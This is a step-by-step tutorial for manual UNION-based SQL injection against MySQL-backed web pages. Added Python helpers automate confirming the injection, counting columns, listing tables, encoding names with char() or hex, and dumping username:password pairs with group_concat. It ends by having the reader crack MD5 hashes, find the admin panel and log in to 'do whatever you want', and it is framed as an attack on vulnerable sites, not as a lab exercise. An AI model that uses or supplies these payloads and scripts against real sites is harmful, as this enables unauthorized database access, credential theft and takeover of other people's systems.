Basic Manual SQL Injection Tutorial

Hello friends, this is a basic manual SQL injection tutorial for all of you!

SQLi stands for "SQL injection" (SQL being Structured Query Language). SQL injection is a code injection technique that exploits a security vulnerability in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements or is not strongly typed, so that it is unexpectedly executed as part of the query. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. The reliable fix on the defending side is to pass user input to the database as a bound parameter of a prepared statement rather than concatenating it into the query string.


Steps To Exploit:

1. First you need to find a vulnerable website: a page that takes a parameter from the URL and puts it straight into a database query, for example:
http://example.com/index.php?id=15


2. To check whether the site is vulnerable, add ' after the id:
http://example.com/index.php?id=15'
If the page comes back with a database error (an example is shown under step 3), the quote reached the SQL parser unescaped. No error on screen does not prove the site is safe; many sites simply hide their errors.


3. Now you need to find the number of columns the query returns.
To find it we add "order by 1--" and keep increasing the digit until it shows an error. ORDER BY n works as long as n is not larger than the column count, so the last number that does not error is the count.
http://example.com/index.php?id=15 order by 1--
http://example.com/index.php?id=15 order by 2--
http://example.com/index.php?id=15 order by 3--
http://example.com/index.php?id=15 order by 4--
http://example.com/index.php?id=15 order by 5--
http://example.com/index.php?id=15 order by 6--

An error from the ' test in step 2 looks like this:
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\'39' at
line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=\'39

The ORDER BY error is shorter, for example:
Unknown column '6' in 'order clause'

If the query errors as soon as you add --, the server wants whitespace after the double dash; use --+ (the + decodes to a space) or %23 (a # comment) instead.


4. Now select the columns.
Here the column count is 5 (order by 6 gave the error).
Your case will be different, so use the number you found; if the UNION errors with "The used SELECT statements have a different number of columns", the count is wrong.
http://example.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5--
Some of the numbers 1 to 5 now appear somewhere on the page; those positions are where we can read data out. If none of them show, use a negative id (id=-15 UNION ALL SELECT 1,2,3,4,5--) so the original row matches nothing and the UNION row is the one displayed.


5. Finding the version.
Pick one of the numbers that was displayed in step 4 (if you are not sure which, try each in turn) and replace it with @@version. I choose 1:
http://example.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5--
You get the version like this:
5.0.32-Debian_7etch11-log
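Steps 1 to 5 above are mechanical, so here they are as a script. This is an added example, not code from the original post: `fetch` is a hypothetical callable that returns the body of a page for a URL (in a real run it would wrap an HTTP client), and `make_fake_target` is a constructed stand-in for the tutorial's example.com page that answers the way a MySQL-backed page with a given number of columns would, so the script runs offline.

```python
import re
from typing import Callable

Fetch = Callable[[str], str]

# Fragments of MySQL error text that show the injected input reached the parser.
SQL_ERROR_MARKERS = (
    "You have an error in your SQL syntax",
    "Unknown column",
    "database query failure",
    "different number of columns",
)


def is_sql_error(body: str) -> bool:
    return any(marker in body for marker in SQL_ERROR_MARKERS)


def confirm_injection(fetch: Fetch, base: str, value: str) -> bool:
    """Step 2: append a single quote and see whether a database error comes back."""
    return is_sql_error(fetch(f"{base}?id={value}'"))


def count_columns(fetch: Fetch, base: str, value: str, max_cols: int = 50) -> int:
    """Step 3: ORDER BY n works for n up to the column count and fails one past it.
    The tutorial's '--' terminator is kept; on a target that rejects it, use '--+' or '%23'."""
    for n in range(1, max_cols + 1):
        if is_sql_error(fetch(f"{base}?id={value} order by {n}--")):
            return n - 1
    raise RuntimeError(f"no ORDER BY error up to {max_cols}; probably not a numeric injection")


def union_payload(value: str, ncols: int, expr: str = "", pos: int = 1) -> str:
    """Steps 4-5: UNION ALL SELECT with placeholders 1..ncols and `expr` swapped into
    display position `pos`. The id is negated so the original row matches nothing and
    the UNION row is the one the page renders."""
    cols = [str(i) for i in range(1, ncols + 1)]
    if expr:
        cols[pos - 1] = expr
    return f"-{value} UNION ALL SELECT {','.join(cols)}--"


def make_fake_target(ncols: int, version: str = "5.0.32-Debian_7etch11-log") -> Fetch:
    """Constructed stand-in for http://example.com/index.php?id=N (not a real site):
    errors on a stray quote, on ORDER BY past `ncols`, and on a UNION of the wrong
    width; otherwise renders the UNION row with @@version filled in."""
    def fetch(url: str) -> str:
        injected = url.split("?id=", 1)[1]
        if injected.endswith("'"):
            return "You have an error in your SQL syntax; check the manual ... near ''' at line 1"
        m = re.search(r"order by (\d+)--$", injected)
        if m:
            n = int(m.group(1))
            return f"Unknown column '{n}' in 'order clause'" if n > ncols else "<html>item page</html>"
        m = re.search(r"UNION ALL SELECT (.+)--$", injected)
        if m:
            cols = m.group(1).split(",")
            if len(cols) != ncols:
                return "The used SELECT statements have a different number of columns"
            return " | ".join(version if c == "@@version" else c for c in cols)
        return "<html>item page</html>"
    return fetch


if __name__ == "__main__":
    base, value = "http://example.com/index.php", "15"
    fetch = make_fake_target(5)
    print("injectable:", confirm_injection(fetch, base, value))
    ncols = count_columns(fetch, base, value)
    print("columns:", ncols)
    print("version row:", fetch(f"{base}?id={union_payload(value, ncols, '@@version')}"))
```

Against a real page the spaces and the quote in these URLs have to be percent-encoded by whatever HTTP client `fetch` wraps (a browser does that for you), and `is_sql_error` should be extended with whatever error text the particular site leaks.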


6. Finding tables
http://example.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables--
And you will get tables like this:
PRODUCTS, ADMINS, and others
Look for tables with names like admin, users, user, login or client; that is where the credentials usually are. information_schema exists from MySQL 5.0 onward, so on a 4.x server you have to guess table names instead. To get every name in one response rather than one per page load, select group_concat(table_name), and add where table_schema=database() to leave out MySQL's own tables.


7. Finding columns in the table ADMINS.
http://example.com/index.php?id=15 UNION ALL SELECT
column_name,2,3,4,5 from information_schema.columns where
table_name=char()--


We found the ADMINS table, but we cannot write 'ADMINS' in the query because quotes are exactly what the injection is fighting with, so we pass the name as char() of its ASCII codes instead.
Go to an ASCII/HTML-entity converter on the web and convert ADMINS; you get something like &#65;&#68;&#77;&#73;&#78;&#83;
Remove each &# and replace every ; with a comma.
Like this: 65,68,77,73,78,83 (A=65, D=68, M=77, I=73, N=78, S=83)
Put table_name=char(65,68,77,73,78,83)-- in the query:
http://example.com/index.php?id=15 UNION ALL SELECT
column_name,2,3,4,5 from information_schema.columns where
table_name=char(65,68,77,73,78,83)--
A hex literal does the same job with less typing: table_name=0x41444D494E53
And you will get the columns in table ADMINS.
There should be columns with names like username and password.


8. Getting username and password.
Now we put concat(username,0x3a,password) in the displayed position and admins as the table:
http://example.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins--
(0x3a is the hex code for ':', so each result reads username:password.)
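Steps 6 to 8 (and the hash check in step 9) as helpers, so the encoding and the query building do not have to be done by hand each time. This is an added example, not code from the original post; the column count 5, the display position 1 and the table/column names are the tutorial's and are passed in as parameters. It goes one step beyond the page by wrapping the selected expression in group_concat(), which returns every row in a single response instead of one row per page load.

```python
def to_char(name: str) -> str:
    """'ADMINS' -> 'char(65,68,77,73,78,83)'. MySQL's CHAR() rebuilds the string
    from its code points, so the payload contains no quote characters at all."""
    return "char(" + ",".join(str(ord(ch)) for ch in name) + ")"


def to_hex(name: str) -> str:
    """'ADMINS' -> '0x41444D494E53', a MySQL hex string literal with the same effect."""
    return "0x" + name.encode("ascii").hex().upper()


def union_select(ncols: int, expr: str, pos: int = 1, from_clause: str = "") -> str:
    """UNION ALL SELECT with `expr` in display position `pos` and 1..ncols elsewhere."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[pos - 1] = expr
    query = "UNION ALL SELECT " + ",".join(cols)
    if from_clause:
        query += " from " + from_clause
    return query + "--"


def list_tables(ncols: int, pos: int = 1, current_db_only: bool = True) -> str:
    """Step 6. group_concat() packs every table name into the one displayed field;
    table_schema=database() drops MySQL's own tables from the list."""
    where = " where table_schema=database()" if current_db_only else ""
    return union_select(ncols, "group_concat(table_name)", pos,
                        "information_schema.tables" + where)


def list_columns(ncols: int, table: str, pos: int = 1) -> str:
    """Step 7, with the table name passed as char() instead of a quoted string."""
    return union_select(ncols, "group_concat(column_name)", pos,
                        f"information_schema.columns where table_name={to_char(table)}")


def dump_credentials(ncols: int, table: str, user_col: str = "username",
                     pass_col: str = "password", pos: int = 1) -> str:
    """Step 8. 0x3a is ':' so every entry reads user:password; group_concat joins
    the entries with ','."""
    return union_select(ncols, f"group_concat(concat({user_col},0x3a,{pass_col}))",
                        pos, table)


def looks_like_md5(value: str) -> bool:
    """Step 9 check: an MD5 digest is exactly 32 hex characters."""
    return len(value) == 32 and all(ch in "0123456789abcdef" for ch in value.lower())


def split_credentials(row: str) -> list:
    """Turn the group_concat output 'user1:hash1,user2:hash2' into (user, secret) pairs."""
    return [tuple(entry.split(":", 1)) for entry in row.split(",") if ":" in entry]


if __name__ == "__main__":
    # The tutorial's numbers: 5 columns, position 1 is displayed.
    for payload in (list_tables(5), list_columns(5, "ADMINS"), dump_credentials(5, "admins")):
        print("http://example.com/index.php?id=-15 " + payload)
    # Constructed sample of what step 8 might return, not real data.
    for user, secret in split_credentials("admin:2510c39011c5be704182423e3a695e91,bob:letmein"):
        print(user, "md5 hash" if looks_like_md5(secret) else "plaintext", secret)
```

group_concat() output is cut off at the server's group_concat_max_len (1024 bytes by default), so on a database with many tables you may still need the tutorial's plain table_name form together with LIMIT n,1 to page through the rest.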


9. Found username and password
So you found the username and password.
If the password is a hash like this: 2510c39011c5be704182423e3a695e91 (32 hex characters, the length of an MD5 digest)
you will need an MD5 hash cracker (a lookup/rainbow-table site or an offline brute-force tool).
If the password is not hashed you are lucky, and now you need to find the admin panel.


10. Finding the admin panel
Open the Admin Finder tool,
put the website in the box below and click Scan.


So you found the admin panel and it looks like this: http://example.com/admin/login.php
Open the page; there is a form with Username: and Password: fields.
Enter the username and password you got.


Done, you are logged in to the admin panel.
Now you can do whatever you want.
Hope it helps you.